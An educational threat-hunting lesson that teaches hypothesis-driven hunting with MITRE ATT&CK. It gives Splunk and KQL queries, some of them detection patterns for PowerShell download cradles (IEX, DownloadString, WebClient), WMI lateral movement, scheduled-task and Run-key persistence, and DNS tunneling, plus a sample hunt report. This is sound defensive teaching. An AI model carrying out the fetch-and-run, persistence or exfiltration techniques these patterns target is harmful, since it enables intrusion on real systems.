Threat Hunting Fundamentals

advanced45 minWriteup

Proactively searching for threats

Learning Objectives

  • Understand threat hunting
  • Develop hunting hypotheses
  • Use MITRE ATT&CK for hunting
  • Document and report findings

Threat Hunting is the proactive search for threats that have evaded automated detection. While SOC analysts wait for alerts, threat hunters actively look for hidden adversaries. It's like going from alarm-based security to actively patrolling for intruders.

Think of it as the difference between a home alarm and a security guard doing rounds. The alarm only triggers when something specific happens. The guard looks for anything suspicious - an open window, a car circling the block, anything that doesn't fit the pattern. Threat hunters look for anomalies that detections miss.

Hunt Assumes Compromise

Threat hunting operates under the assumption that adversaries are already in the network. You're not hoping to find nothing - you're expecting to find something and proving yourself wrong.

Hunting vs Detection

1Threat Hunting vs Alert-Based Detection:
2 
3ALERT-BASED DETECTION
4─────────────────────────────────────────────────────────────────
5├── Reactive: Wait for rules to trigger
6├── Known threats: Detects what rules define
7├── Automated: Runs continuously
8├── Scalable: Handles volume well
9└── Limitation: Can't catch unknown TTPs
10 
11THREAT HUNTING
12─────────────────────────────────────────────────────────────────
13├── Proactive: Actively search for threats
14├── Unknown threats: Finds what rules miss
15├── Human-driven: Analyst expertise required
16├── Hypothesis-based: Test theories about attacks
17└── Output: New detections, validated or disproved hypotheses
18 
19COMPLEMENTARY APPROACHES
20─────────────────────────────────────────────────────────────────
21Detection finds known bad (rules)
22Hunting finds unknown bad (anomalies)
23Together = comprehensive coverage
24 
25Example:
26├── Detection rule: 606070;">#a5d6ff;">"PowerShell with -EncodedCommand"
27├── Hunting query: 606070;">#a5d6ff;">"What PowerShell ran without detection?"
28└── Result: Find new evasion technique → Create new rule

Hypothesis-Driven Hunting

1Hypothesis-Driven Hunting Framework:
2 
3THE HUNTING LOOP
4─────────────────────────────────────────────────────────────────
5      ┌─────────────────────────────────────────┐
61. CREATE HYPOTHESIS            │
7606070;">#a5d6ff;">"Attackers may be using X technique"
8      └───────────────────┬─────────────────────┘
9
10      ┌─────────────────────────────────────────┐
112. INVESTIGATE                  │
12      │  Search data, analyze patterns          │
13      └───────────────────┬─────────────────────┘
14
15      ┌─────────────────────────────────────────┐
163. IDENTIFY PATTERNS/ANOMALIES     │
17      │  Find evidence supporting hypothesis    │
18      └───────────────────┬─────────────────────┘
19
20      ┌─────────────────────────────────────────┐
214. RESPOND OR TUNE                 │
22      │  Incident? → Respond                    │
23      │  Normal? → Document baseline            │
24      │  Gap? → Create detection                │
25      └───────────────────┬─────────────────────┘
26
27                    (Repeat)
28 
29HYPOTHESIS SOURCES
30─────────────────────────────────────────────────────────────────
31├── Threat Intelligence: APT29 uses X technique
32├── MITRE ATT&CK: Hunt for T1059.001 gaps
33├── Red Team findings: What did pentest bypass?
34├── Industry reports: Ransomware groups doing Y
35├── Anomaly alerts: Investigate unusual patterns
36└── Experience: 606070;">#a5d6ff;">"Something feels off about..."
37 
38GOOD HYPOTHESIS EXAMPLES
39─────────────────────────────────────────────────────────────────
40606070;">#a5d6ff;">"Attackers may be using LOLBins for execution"
41606070;">#a5d6ff;">"Data may be exfiltrating via DNS tunneling"
42606070;">#a5d6ff;">"Persistence may exist via scheduled tasks"
43606070;">#a5d6ff;">"Lateral movement may be occurring via WMI"
44 
45BAD HYPOTHESIS EXAMPLES
46─────────────────────────────────────────────────────────────────
47606070;">#a5d6ff;">"Find all the hackers" (too vague)
48606070;">#a5d6ff;">"Look at everything" (not actionable)
49606070;">#a5d6ff;">"Check if we're secure" (not specific)

Hunting with MITRE ATT&CK

1Using ATT&CK for Threat Hunting:
2 
3STEP 1: IDENTIFY TECHNIQUE TO HUNT
4─────────────────────────────────────────────────────────────────
5Choose based on:
6├── Threat intel (what APTs use against your sector)
7├── Detection gaps (what you can't currently detect)
8├── High-impact techniques (credential access, exfil)
9└── Prevalence in incidents
10 
11STEP 2: UNDERSTAND THE TECHNIQUE
12─────────────────────────────────────────────────────────────────
13For T1059.001 (PowerShell):
14├── How is it used by attackers?
15├── What are the variations?
16├── What artifacts does it leave?
17└── What data sources capture it?
18 
19STEP 3: FORM HYPOTHESIS
20─────────────────────────────────────────────────────────────────
21"Attackers may be using PowerShell to download
22and execute payloads while evading our detection."
23 
24STEP 4: BUILD HUNT QUERY
25─────────────────────────────────────────────────────────────────
26Splunk example:
27index=sysmon EventCode=1
28  Image=606070;">#a5d6ff;">"*\powershell.exe"
29  (CommandLine=606070;">#a5d6ff;">"*IEX*" OR CommandLine="*DownloadString*"
30   OR CommandLine=606070;">#a5d6ff;">"*WebClient*" OR CommandLine="*Invoke-*")
31| stats count by ComputerName, User, CommandLine
32 
33STEP 5: ANALYZE RESULTS
34─────────────────────────────────────────────────────────────────
35├── Review each result
36├── Is it malicious or legitimate?
37├── Can we baseline legitimate usage?
38└── What variations did we miss?
39 
40STEP 6: ACTION
41─────────────────────────────────────────────────────────────────
42Found malicious? → Incident response
43Found gap? → Create detection rule
44Found nothing? → Document, try different angle

Hunt Query Examples

sql
1-- HUNTING QUERIES (Splunk SPL format)
2 
3-- HUNT: Unusual Parent-Child Process Relationships
4-- Hypothesis: Attackers spawn shells from unexpected parents
5index=sysmon EventCode=1
6| eval parent_child=ParentImage.606070;">#a5d6ff;">"|".Image
7| stats count by parent_child
8| where count < 5
9| sort count
10 
11-- HUNT: PowerShell Download Cradles
12-- Hypothesis: Attackers download payloads via PowerShell
13index=sysmon EventCode=1 Image=606070;">#a5d6ff;">"*\powershell.exe"
14| where match(CommandLine, 606070;">#a5d6ff;">"(?i)(iex|invoke-expression|downloadstring|webclient|bitstransfer)")
15| table _time, ComputerName, User, CommandLine
16 
17-- HUNT: Rare Scheduled Tasks
18-- Hypothesis: Attackers create tasks for persistence
19index=sysmon EventCode=1
20| where ParentImage=606070;">#a5d6ff;">"*\schtasks.exe" OR
21        match(CommandLine, 606070;">#a5d6ff;">"(?i)schtasks.*\/create")
22| stats count by CommandLine
23| where count < 3
24 
25-- HUNT: Lateral Movement via WMI
26-- Hypothesis: Attackers use WMI for remote execution
27index=sysmon EventCode=1
28| where ParentImage=606070;">#a5d6ff;">"*\WmiPrvSE.exe"
29| stats count by ComputerName, User, Image, CommandLine
30 
31-- HUNT: Unusual Outbound Connections
32-- Hypothesis: C2 over non-standard ports
33index=firewall action=allow direction=outbound
34| where NOT match(dest_port, 606070;">#a5d6ff;">"^(80|443|53|25)$")
35| stats count by src_ip, dest_ip, dest_port
36| where count > 100
37 
38-- HUNT: DNS Tunneling
39-- Hypothesis: Data exfiltration via DNS
40index=dns
41| eval query_length=len(query)
42| where query_length > 50
43| stats count, avg(query_length) by src_ip
44| where count > 100
1-- Elastic KQL equivalents
2 
3606070;">// Unusual PowerShell
4event.code: 1 AND process.name: 606070;">#a5d6ff;">"powershell.exe" AND
5process.command_line: (*DownloadString* OR *IEX* OR *WebClient*)
6 
7606070;">// WMI Remote Execution
8event.code: 1 AND process.parent.name: 606070;">#a5d6ff;">"WmiPrvSE.exe"
9 
10606070;">// Scheduled Task Creation
11event.code: 1 AND process.command_line: *schtasks* AND
12process.command_line: */create*

Anomaly-Based Hunting

1Anomaly-Based Hunting Approaches:
2 
3BASELINE COMPARISON
4─────────────────────────────────────────────────────────────────
5Concept: Establish normal, find deviations
6 
7Example: Login times
81. Baseline: Users typically log in 8-6 PM
92. Hunt: Find logins at 3 AM
103. Analyze: Is it attacker or legitimate exception?
11 
12Query (Splunk):
13index=windows EventCode=4624
14| eval hour=strftime(_time, 606070;">#a5d6ff;">"%H")
15| where hour < 6 OR hour > 20
16| stats count by user, hour
17| sort -count
18 
19FIRST-TIME OCCURRENCE
20─────────────────────────────────────────────────────────────────
21Concept: Alert on 606070;">#a5d6ff;">"first time ever" events
22 
23Examples:
24├── User logs into server for first time
25├── New service installed on DC
26├── First connection to external IP
27└── New scheduled task on workstation
28 
29Query (Splunk):
30index=windows EventCode=4624 LogonType=10
31| stats earliest(_time) as first_seen by user, dest
32| where first_seen > relative_time(now(), 606070;">#a5d6ff;">"-24h")
33 
34STATISTICAL ANOMALIES
35─────────────────────────────────────────────────────────────────
36Concept: Find outliers from normal distribution
37 
38Examples:
39├── User with 10x normal data transfer
40├── Process with unusual network volume
41├── Host with spike in DNS queries
42└── Account with abnormal login frequency
43 
44Query (Splunk):
45index=proxy
46| stats sum(bytes_out) as total by src_ip
47| eventstats avg(total) as avg_bytes, stdev(total) as stdev_bytes
48| where total > (avg_bytes + (3 * stdev_bytes))
49 
50RARE OCCURRENCES
51─────────────────────────────────────────────────────────────────
52Concept: Investigate things that rarely happen
53 
54Examples:
55├── Rare process names
56├── Unusual port combinations
57├── Uncommon user-agent strings
58└── Infrequent command combinations

Hunt Scenarios

1Example Hunt: Persistence Mechanisms
2 
3HYPOTHESIS
4─────────────────────────────────────────────────────────────────
5"Attackers may have established persistence via registry
6Run keys that are not flagged by our current detections."
7 
8DATA SOURCES
9─────────────────────────────────────────────────────────────────
10├── Sysmon Event 12/13/14 (Registry)
11├── Windows Security Event 4657
12├── EDR registry telemetry
13 
14HUNT QUERIES
15─────────────────────────────────────────────────────────────────
16Splunk:
17index=sysmon EventCode=13
18| where match(TargetObject, 606070;">#a5d6ff;">"(?i)(currentversion\\run|policies\\explorer\\run)")
19| stats count by ComputerName, TargetObject, Details
20| sort -count
21 
22ANALYSIS
23─────────────────────────────────────────────────────────────────
24For each result:
25├── Is the executable path legitimate?
26├── Is it in an unusual location (Temp, Downloads)?
27├── Is the filename suspicious?
28├── Does the hash exist in threat intel?
29└── Is this baseline for this system?
30 
31FINDINGS EXAMPLE
32─────────────────────────────────────────────────────────────────
33MALICIOUS FOUND:
34├── WORKSTATION-42
35├── Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
36├── Value: 606070;">#a5d6ff;">"SecurityUpdate"
37├── Data: 606070;">#a5d6ff;">"C:\Users\Public\Downloads\svc.exe"
38└── Action: Incident Response initiated
39 
40FALSE POSITIVE:
41├── All workstations
42├── Key: HKLM\...\Run
43├── Value: 606070;">#a5d6ff;">"Defender"
44├── Data: 606070;">#a5d6ff;">"C:\Program Files\Windows Defender\..."
45└── Action: Add to baseline/whitelist

Documenting Hunts

1Hunt Documentation Template:
2 
3HUNT REPORT
4═══════════════════════════════════════════════════════════════
5 
6Hunt ID:        TH-2024-042
7Hunt Name:      Scheduled Task Persistence
8Date:           2024-07-15
9Hunter:         Analyst Name
10Status:         Completed
11 
12HYPOTHESIS
13─────────────────────────────────────────────────────────────────
14Attackers may have created malicious scheduled tasks on
15workstations for persistence that evade our current detections.
16 
17MITRE ATT&CK MAPPING
18─────────────────────────────────────────────────────────────────
19├── T1053.005 - Scheduled Task
20└── TA0003 - Persistence
21 
22DATA SOURCES
23─────────────────────────────────────────────────────────────────
24├── Sysmon Event ID 1 (Process Creation)
25├── Windows Security Event 4698 (Task Created)
26└── Task Scheduler logs
27 
28SCOPE
29─────────────────────────────────────────────────────────────────
30├── Time range: Last 30 days
31├── Systems: All workstations (2,500 endpoints)
32└── Query execution: 4 hours
33 
34QUERIES USED
35─────────────────────────────────────────────────────────────────
36[Insert queries here]
37 
38FINDINGS
39─────────────────────────────────────────────────────────────────
40Total tasks reviewed:  342
41Known legitimate:      320
42New legitimate:         18
43Suspicious:              3
44Confirmed malicious:     1
45 
46MALICIOUS FINDING
47─────────────────────────────────────────────────────────────────
48System: WORKSTATION-42
49Task Name: WindowsUpdateTask
50Action: C:\Users\Public\svc.exe
51Creation Time: 2024-06-28 02:34:00
52Created By: jsmith
53Status: Escalated to IR (INC-2024-089)
54 
55RECOMMENDATIONS
56─────────────────────────────────────────────────────────────────
571. Create detection rule for tasks running from Public folder
582. Add baseline whitelist for legitimate tasks
593. Schedule recurring hunt quarterly

Hunt Methodology

Threat Hunting Workflow

1
HypothesisForm specific, testable hypothesis
2
PlanIdentify data sources and queries needed
3
ExecuteRun queries, collect results
4
AnalyzeReview each finding for malicious activity
5
RespondEscalate confirmed threats to IR
6
ImproveCreate detections, update baselines
7
DocumentRecord findings and recommendations

Knowledge Check

Quick Quiz
Question 1 of 3

What is the primary difference between threat hunting and alert-based detection?

Challenges

Design a Threat Hunt

Challenge
💀 advanced

Design a threat hunt for MITRE ATT&CK technique T1059.001 (PowerShell). Include: hypothesis, data sources needed, a query, and what you would look for in results.

Need a hint? (4 available)

Key Takeaways

  • Hunting is proactive search; detection is reactive to rules
  • Form specific, testable hypotheses based on ATT&CK or threat intel
  • Hunting assumes breach - you're proving you're NOT compromised
  • Anomaly hunting: first-time events, rare occurrences, statistical outliers
  • Document everything - findings become future detections
  • Hunt output: confirmed threats, new detections, validated baselines